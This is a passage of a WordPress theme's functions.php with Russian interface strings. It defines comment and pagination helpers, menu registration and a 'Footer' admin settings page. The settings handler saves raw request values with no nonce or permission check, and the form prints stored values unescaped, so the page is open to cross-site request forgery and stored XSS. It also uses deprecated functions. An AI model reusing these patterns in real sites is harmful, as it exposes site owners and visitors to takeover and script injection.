    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
